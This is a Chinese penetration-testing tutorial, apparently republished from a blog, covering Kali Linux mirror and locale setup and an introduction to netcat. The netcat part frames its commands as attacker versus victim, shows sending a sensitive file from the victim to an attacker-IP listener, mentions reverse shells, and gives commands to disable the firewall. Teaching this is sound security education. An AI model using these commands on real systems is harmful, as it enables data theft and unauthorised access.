免責聲明:內(nèi)容僅供學習參考,請合法利用知識,禁止進行違法犯罪活動!
內(nèi)容參考于: 易錦網(wǎng)校會員專享課
上一個內(nèi)容:12.WEB滲透測試-Linux系統(tǒng)管理、安全加固(下)-CSDN博客
kali由 Offensive Security 開發(fā)并重寫 BackTrack,Kali Linux 發(fā)行版在我們用于黑客目的的最佳操作系統(tǒng)列表中名列前茅。這個基于 Debian 的操作系統(tǒng)附帶了 600 多個預裝的筆測試工具,使您的安全工具箱更加豐富。這些通用工具會定期更新,并適用于 ARM 和 VMware 等不同平臺。對于司法鑒定工作,此頂級黑客操作系統(tǒng)具有實時啟動功能,該功能為漏洞檢測提供了理想的環(huán)境。
官方網(wǎng)站:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution
Kali Linux是基于Debian的Linux發(fā)行版,Kali Linux預裝了許多滲透測試軟件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng 超過300個滲透測試工具。安全軟件分為:信息收集、脆弱性分析、開發(fā)工具、無線攻擊、取證工具、Web應用程序、壓力測試、嗅探和欺騙、密碼攻擊、維護訪問權(quán)限、硬件攻擊、逆向工程、硬件攻擊。
1.kali的優(yōu)化
kali配置參考文檔:kali Linux的設置和優(yōu)化(雙系統(tǒng))_kailyouhua-CSDN博客
kali設置中文參考:kali linux設置中文方法 漢化教程-阿里云開發(fā)者社區(qū)
打開系統(tǒng)是英文界面,打開命令行
kali切換root用戶:
sudo su
更改鏡像源:
/etc/apt/sources.list 輸入vi /etc/apt/sources.list進入編輯界面后輸入國內(nèi)鏡像地址,并用#把原地址標注掉
中科大:deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src Index of /kali/ kali-rolling main non-free contrib
阿里云: deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
清華大學:deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
更新軟件數(shù)據(jù)庫:
sudo apt-get update
更新軟件:
sudo apt-get upgrade
更新過程中一直選擇yes
出現(xiàn){ok}需要點擊Tab鍵選中后才能按回車,不然會沒有反應
更新完成顯示界面
設置語言包:
sudo dpkg-reconfigure locales
注意:只選擇一種語言要是不小心多選上了,可以按空格取消,選中*號的語言后摁tab后回車
修改縮放比例:hidp
2.netcat簡介與使用
NC(netcat)被稱為網(wǎng)絡工具中的瑞士軍刀,體積小巧,但功能強大。Nc主要功能,Nc可以在兩臺設備上面相互交互,即偵聽模式/傳
快速查看ip指令:
ip a
攻擊者: nc -lnvp 8888
受害者: nc 攻擊者ip 攻擊者開放的端口號
效果演示:
?文章來源地址http://www.zghlxwxcb.cn/news/detail-839560.html
斷開連接:
ctrl+c
注意:兩臺機器不在同一個局域網(wǎng)內(nèi)通信需要使用反彈shell 兩臺機器在同一個局域網(wǎng)無法通信需要關(guān)閉防火墻
service firewalld status 查看防火墻狀態(tài) sudo systemctl stop firewalld 關(guān)閉防火墻 sudo systemctl start firewalld 開啟防火墻 sudo systemctl disable firewalld 永久關(guān)閉
傳輸文件內(nèi)容:受害者將自己本地的1.txt發(fā)送到攻擊者的1.txt里面,包含敏感信息的文件我們直接發(fā)送回來 攻擊者(服務端;接收):nc -lvp 端口號 > 1.txt加n更詳細
受害者(客戶端;發(fā)送):nc ip地址 端口號 < 1.txt
攻擊者的文件名可以隨便起,受害者這邊必須得有這個文件才能發(fā)送
?文章來源:http://www.zghlxwxcb.cn/news/detail-839560.html
?
?
到了這里,關(guān)于13.WEB滲透測試--Kali Linux(一)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!